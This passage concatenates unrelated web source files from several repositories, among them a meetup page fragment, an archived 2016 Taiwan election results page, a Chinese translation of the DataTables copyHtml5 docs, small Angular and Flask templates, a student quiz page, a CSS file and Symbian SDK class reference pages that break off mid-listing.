href="http://www.theredchurchbrewery.com/">Redchurch Brewery</a> Poyser St, London Borough of Tower Hamlets, E2 9RF</s></p> <ul> <li>Not Accessible</li> <li>Nearly empty on weekdays</li> <li>Close to, but not in, Shoreditch. Close to Cambridge Heath train station</li> <li>Good beer brewed onsite</li> </ul> <h3>The People</h3> <p>Talk to us if you want to attend, or just turn up!</p> <p>On twitter: <a href="http://twitter.com/ntlk">@ntlk</a> <a href="http://twitter.com/didlix">@didlix</a> <a href="http://twitter.com/tef">@tef</a> <a href="http://twitter.com/tomstuart">@tomstuart</a> <a href="http://twitter.com/drmaciver">@drmaciver</a> <a href="http://twitter.com/samphippen">@samphippen</a> <a href="http://twitter.com/mistertim">@mistertim</a> <a href="http://twitter.com/alsothings">@alsothings</a> </p> <p>If you want to attend, say hello to someone, and they will drag you along.</p> </section> <section id="license"> <p xmlns:dct="http://purl.org/dc/terms/"> <a rel="license" href="http://creativecommons.org/publicdomain/zero/1.0/"> <img src="http://i.creativecommons.org/p/zero/1.0/88x31.png" style="border-style: none;" alt="CC0" /> </a> <br /> To the extent possible under law, <span rel="dct:publisher" resource="[_:publisher]">the person who associated CC0</span> with this work has waived all copyright and related or neighboring rights to this work. </p> </section> </body> </html>
foldr_history-menu.html
g0v/vtw.link
<div class="menu"><div class="item no data hidden">您還沒有瀏覽 foldr 的紀錄</div></div>
data/president/n705001300000000/20160116111628/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 雲林縣 二崙鄉得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">2,358</td> <td class="tdAlignRight">16.8453</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">10,660</td> <td class="tdAlignRight">76.1537</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">980</td> <td class="tdAlignRight">7.0010</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;23/23&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 19:15:12 +0800" title="Sat, 16 Jan 2016 19:15:12 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;19:15:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
reference/button/copyHtml5.html
ssy341/datatables-cn
--- layout: reference_option_detail_layout title: 一个用来把表格数据复制到剪贴板的按钮(使用Html5)(copyHtml5) relurl: http://datatables.net/reference/button/copyHtml5 since: Buttons 1.0.0 --- <h1 class="page_title">copyHtml5</h1> <div style="color: #ac5900;float: right;">起始版本号: {{ page.since }}</div> <p>一个用来把表格数据复制到剪贴板的按钮(使用Html5)</p> <p style="color:red">注意:这个需要使用Bottons扩展</p> <a name="Description"></a> <h2 data-anchor="Description">说明(Description)</h2> <p> 这个按钮提供了一个简单的动作,把数据复制到剪贴板 </p> <p> 使用 Buttons 1.0.0,在浏览器支持的前提下即可复制数据到剪贴板。 如下浏览器支持: <ul> <li>Chrome 42+</li> <li>Firefox 41+</li> <li>IE9+</li> <li>Opera 29+</li> </ul> </p> <p> 老版的浏览器(和Safari),或者是低版本的 Buttons,会提示用户用键盘或者Edit菜单来复制表格数据 到剪贴板,通过一个隐藏的 <code>textarea<span>Tag</span></code>,然后默认选中text实现。 </p> <p> 当然也可以取消复制操作,在弹出的对话框里。 </p> <p> 通过 {% include href/Options.html param="language" %} 选项来配置提示用的信息。默认情况下为一下代码: <pre class="brush:js;toolbar:false">{ copy: &#39;Copy&#39;, copySuccess: { 1: &quot;Copied one row to clipboard&quot;, _: &quot;Copied %d rows to clipboard&quot; }, copyTitle: &#39;Copy to clipboard&#39;, copyKeys: &#39;Press &lt;i&gt;ctrl&lt;/i&gt; or &lt;i&gt;\u2318&lt;/i&gt; + &lt;i&gt;C&lt;/i&gt; to copy the table data&lt;br&gt;to your system clipboard.&lt;br&gt;&lt;br&gt;To cancel, click this message or press escape.&#39; }</pre> </p> <p> 注意虽然这里取名为Html5 ,但实际上并不要Html5 API的支持。所以这种方式试用于所有支持Datatables的浏览器 </p> <a name="Options"></a> <h2 data-anchor="Options">选项(Options)</h2> <p>这个按钮有以下选项配置:</p> <table class="parameters buttons dataTable stripe row-border no-footer"> <thead style="text-align:left"> <tr> <th>名称</th> <th>默认</th> </tr> </thead> <tbody> <tr class="odd"> <td><code>text</code></td> <td>Copy</td> </tr> <tr class="odd continuation"> <td colspan="2"> 按钮上显示的文字,使用 {% include href/option/buttons.buttons.text %} 配置显示的文字内容 或者 <code>buttons.copy</code>,关于语言的配置参考 {% include href/Options.html param="language" %} </td> </tr> <tr class="even"> <td><code>className</code></td> <td>buttons-copy buttons-html5</td> </tr> <tr class="even continuation"> <td colspan="2"> 按钮的class名称,详情参见 {% include href/option/buttons.buttons.className %} </td> </tr> <tr class="even"> <td><code>action</code></td> <td></td> </tr> <tr class="even continuation"> <td colspan="2"> 显示对话框,提示用户复制数据到剪贴板 </td> </tr> <tr class="odd"> <td><code>fieldSeparator</code></td> <td>\t</td> </tr> <tr class="odd continuation"> <td colspan="2"> 用制表符来隔开数据复制到剪贴板中 </td> </tr> <tr class="odd"> <td><code>fieldBoundary</code></td> <td></td> </tr> <tr class="odd continuation"> <td colspan="2"> The character(s) used to enclose each field in the plain text representation of the table that is copied to the system's clipboard. This is automatically added at the start and end of each cell's data. </td> </tr> <tr class="odd"> <td><code>exportOptions</code></td> <td>{}</td> </tr> <tr class="odd continuation"> <td colspan="2"> 选择性的导出数据,包括哪些列,行,排序或者过滤。 详细参考 {% include href/api/Buttons.html param="buttons().exportData()" %} 方法,这里收集所需要的数据 </td> </tr> <tr class="odd"> <td><code>header</code></td> <td>true</td> </tr> <tr class="odd continuation"> <td colspan="2"> 表头将包含在导出的数据中 </td> </tr> <tr class="odd"> <td><code>footer</code></td> <td>false</td> </tr> <tr class="odd continuation"> <td colspan="2"> 表脚将包含在导出的数据中 </td> </tr> </tbody> </table> <a name="Example"></a> <h2 data-anchor="Example">示例</h2> <div class="reference_examples"> <div class="reference_example"> <div class="title"> <p> Datatables初始化:试用Html5按钮 </p> </div> <pre class="brush:js;toolbar:false">$(&#39;#myTable&#39;).DataTable( { buttons: [ &#39;copyHtml5&#39; ] } );</pre> </div> </div> <div class="reference_examples"> <div class="reference_example"> <div class="title"> <p> Datatables初始化:使用 {% include href/button/copy.button %},让浏览器自动选择 </p> </div> <pre class="brush:js;toolbar:false">$(&#39;#myTable&#39;).DataTable( { buttons: [ &#39;copy&#39; ] } );</pre> </div> </div> <div class="reference_examples"> <div class="reference_example"> <div class="title"> <p> 直接初始化:使用 <code>exportOptions </code>选项配置只导出当前页 </p> </div> <pre class="brush:js;toolbar:false">$(&#39;#myTable&#39;).DataTable( { buttons: [ { extend: &#39;copyHtml5&#39;, text: &#39;Copy current page&#39;, exportOptions: { modifier: { page: &#39;current&#39; } } } ] } );</pre> </div> </div> <div class="reference_examples"> <div class="reference_example"> <div class="title"> <p> Datatables初始化:使用{% include href/Options.html param="language" %} 选项设置显示信息: </p> </div> <pre class="brush:js;toolbar:false">$(&#39;#myTable&#39;).DataTable( { language: buttons: { copyTitle: &#39;Data copied&#39;, copyKeys: &#39;Use your keyboard or menu to select the copy command&#39; } }, buttons: [ &#39;copyHtml5&#39; ] } );</pre> </div> </div> <div class="clear"></div> {% include quote.html %}
app/components/create/race-select/race-select.html
AlexVild/pathfinder-character-manager
<div layout="column"> <div layout="column" layout-align="center center"> <img height="600" width="400" src="{{ raceSelect.races[raceSelect.currentIndex].img }}" align="middle"> </div> <div layout="row"> <div flex="30" layout="row" layout-align="start center"> <md-button class="md-raised" ng-disabled="raceSelect.currentIndex == 0" ng-click="raceSelect.currentIndex = raceSelect.currentIndex - 1"><i class="material-icons">chevron_left</i></md-button> </div> <div flex="40"> <h1 class="md-display-2" align="center">{{ raceSelect.races[raceSelect.currentIndex].name }}</h1> </div> <div flex="30" layout="row" layout-align="end center"> <md-button class="md-raised" ng-disabled="raceSelect.currentIndex == 6" ng-click="raceSelect.currentIndex = raceSelect.currentIndex + 1"><i class="material-icons">chevron_right</i></md-button> </div> </div> <div> <p class="md-subhead">{{ raceSelect.races[raceSelect.currentIndex].description }}</p> </div> <div layout="row" layout-align="start end"> <span flex></span> <md-button class="md-raised md-primary" ng-click="raceSelect.submit()">Continue</md-button> </div> </div>
templates/login.html
dmanier/flask-blog
{% extends "template.html" %} {% block content %} <h2>Welcome to the Flask Blog!</h2> <h3>Please login to access your blog.</h3> <form action="" method="post"> Username: <input type="text" name="username" value="{{request.form.username}}"> Password: <input type="password" name="password" value="{{request.form.password}}"> <p><input type="submit" value="Login"></p> </form> {% endblock %}
quiz2/index.html
ton-tong2121-cmis/ton-tong2121-cmis-wd
<!doctype html> <html> <head> <title> Quiz 2 </title> <meta charset="utf-8"/> <link rel="stylesheet" href="../css/quiz2.css" type="text/css"> </head> <body> <header> <h1> Quiz 2 </h1> <h4> The last quiz!! </h4> </header> <nav> <h2> Navigation </h2> <ul> <li> <a href="..">Home</a> </li> <li> <a href="../tables">Tables</a> </li> <li> <a href="../listsandlinks">Lists and link</a> </li> </ul> </nav> <main> <h2> Main Content </h2> <p> The first paragraph </p> <p> The second paragraph </p> <table border="1"> <tr> <th colspan="4">Things</th> </tr> <tr> <th colspan="2"></th> <th>Dog</th> <th>Cat</th> </tr> <tr> <th rowspan="3">Properties</th> <th>Fur</th> <td>Black</td> <td>Calico</td> </tr> <tr> <th>Diet</th> <td>Dead Rats</td> <td>Live Rats</td> </tr> <tr> <th>Hobbies</th> <td>Chasing its tail</td> <td>mauling rats</td> </tr> <tr> <th>Summary</th> <td colspan="3">Neither animal is reliable</td> </table> </main> <footer> <p> &#169; Peerawit Santipanth - CMIS Web Design </footer> </body> </html>
resources/public/css/swatch.css
exupero/swatch
body { font-family: 'Helvetica Neue', Arial, sans-serif; } h3 { text-transform: capitalize; margin-bottom: 0; } .swatch { display: inline-block; width: 4rem; height: 4rem; margin: 0 0.1rem; border: 1px solid gray; position: relative; margin-bottom: 1.5rem; } .swatch::before { content: attr(data-color); font-family: monospace; position: absolute; top: 4rem; width: 4rem; text-align: center; color: gray; }
resources/public/order/partials/index.html
wayde191/iHakula-NorthernHemisphere
<div ng-include="order" ng-controller="OrderController"> </div>
sdk/GUID-DDB7E87E-BC88-342E-A229-B49B2EE2281E.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="CPbk2AppViewBase" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-DDB7E87E-BC88-342E-A229-B49B2EE2281E" /> <title> CPbk2AppViewBase </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-DDB7E87E-BC88-342E-A229-B49B2EE2281E"> <a name="GUID-DDB7E87E-BC88-342E-A229-B49B2EE2281E"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2518392 id2518473 id2518478 id2518726 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CPbk2AppViewBase Class Reference </h1> <table class="signature"> <tr> <td> class CPbk2AppViewBase : public CAknView </td> </tr> </table> <div class="section"> <div> <p> Phonebook 2 application view base. Provides some common application view functionality. All Phonebook 2's application views have to be derived from this class because CPbk2AppUi assumes it. </p> </div> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> CPbk2AppViewBase <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView </a> <ul class="derivation"> <li class="derivation-depth-2 "> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase </a> </li> </ul> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-2223D3AE-74A0-34BD-87A2-1DD9EA3D8229"> CPbk2AppViewBase </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-0AF979F0-9602-3B6A-8674-22F0FA37094B"> ~CPbk2AppViewBase </a> () </td> </tr> <tr> <td align="right" class="code"> IMPORT_C <a href="GUID-530281E6-29FC-33F2-BC9B-610FBA389444.html"> TUid </a> </td> <td> <a href="#GUID-1A46B692-0C80-36D9-BE33-6D45107D89C4"> ApplicationUid </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-7D85CED1-C5ED-3A2B-A508-2418E404F88A"> ClosePopup </a> () </td> </tr> <tr> <td align="right" class="code"> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-45D95EA4-E1DF-35E1-BE7E-3ADD93A75486"> GetMenuFilteringFlagsL </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-5F17E7DC-E143-3A39-BA61-2595E590ABA4"> LaunchPopupMenuL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C CAknStylusPopUpMenu &amp; </td> <td> <a href="#GUID-34E6D005-BEB1-3797-9A43-4AB333A06CBC"> LaunchStylusPopupMenu2L </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> , const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-82439AFC-26D8-3086-B670-F65219E7C473"> LaunchStylusPopupMenuL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> , const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C <a href="GUID-EFFCFAA1-62A4-3618-B734-A1955237659F.html"> CPbk2ViewState </a> * </td> <td> <a href="#GUID-E2F6BDCC-680A-3DCF-844F-0C645A0C36D5"> ViewStateLC </a> () </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Protected Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TAny </a> * </td> <td> <a href="#GUID-3530F690-B259-3925-859B-98F08A67CC76"> AppViewBaseExtension </a> ( <a href="GUID-530281E6-29FC-33F2-BC9B-610FBA389444.html"> TUid </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-9A7D9C38-0A8E-321A-A6A4-0FB32D933E32"> GetViewSpecificMenuFilteringFlagsL </a> () </td> </tr> <tr> <td align="right" class="code"> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> <a href="#GUID-CE5338BA-F854-3313-8695-6F79335380D3"> HandleCommandKeyL </a> (const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp;, TEventCode ) </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-0E6EFA90-DC4D-338A-8E76-7616F7D57FEA"> HandleLongTapEventL </a> (const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;, const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-86FD79B3-B82A-38EE-A3D9-A244135A03C0"> HandlePointerEventL </a> (const TPointerEvent &amp;) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-B0EC6224-E21A-3FD8-8724-B666E0D61553"> CloseStylusPopup </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-960E328F-827F-3CFC-BE5E-238EFA2F2632"> CreatePopupMenuL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-27871A4C-186A-3AB6-A39C-69422C41157D"> DoLaunchPopupL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-EC17AED1-A3F1-3012-9C35-315903A8A964"> DoLaunchStylusPopupL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> , const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-DD95E5B4-44DE-3F88-B93D-CEC4726D76B8"> Pbk2HandleLongTapEventL </a> (const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;, const <a href="GUID-339EC4C5-89DC-3972-9579-6DD38D418317.html"> TPoint </a> &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> <a href="#GUID-80308BF5-8EB1-3C7A-A363-27CE52E436C4"> Pbk2ProcessKeyEventL </a> (const <a href="GUID-0F8FA6A3-F172-36E4-9CF5-60814ABCD562.html"> TKeyEvent </a> &amp;, TEventCode ) </td> </tr> <tr> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-F86B7B3B-0796-3B4C-960C-FF852440390F"> Pbk2ProcessPointerEventL </a> (const TPointerEvent &amp;) </td> </tr> <tr class="bg"> <td align="right" class="code"> IMPORT_C void </td> <td> <a href="#GUID-0B8641E5-A7C6-3754-80F2-857AA25A1399"> ProcessCommandL </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ActivateViewL(const TVwsViewId &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ActivateViewL(const TVwsViewId &amp;,TUid,const TDesC8 &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::AknViewActivatedL(const TVwsViewId &amp;,TUid,const TDesC8 &amp;) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::AknViewDeactivated() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::AppUi()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::BaseConstructL(TInt) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::CAknView() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::Cba()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ClientRect()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ConstructMenuAndCbaEarlyL() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::CreateAndSetToolbarL(TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::DoActivateL(const TVwsViewId &amp;,TUid,const TDesC8 &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::DoDeactivate() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::HandleCommandL(TInt) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::HandleForegroundEventL(TBool) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::HandleStatusPaneSizeChange() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::HandleViewRectChange() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::Id()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::IsForeground()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::MenuBar()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::MopNext() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::MopSupplyObject(TTypeUid) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ProcessForegroundEventL(TBool) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::Redraw()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::SaveToolbarStatus(TBool,TBool) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::SetEmphasis(CCoeControl *,TBool) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::SetToolbar(CAknToolbar *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ShowToolbarOnViewActivation(TBool) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::StatusPane()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::StopDisplayingMenuBar() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::StopDisplayingToolbar() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::Toolbar()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ToolbarShownOnViewActivation()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ViewActivatedL(const TVwsViewId &amp;,TUid,const TDesC8 &amp;) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ViewDeactivated() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-11967EBB-7439-3775-B287-7560ECA0AF1F.html"> CAknView::ViewId()const </a> </td> </tr> <tr> <td> </td> <td> <a 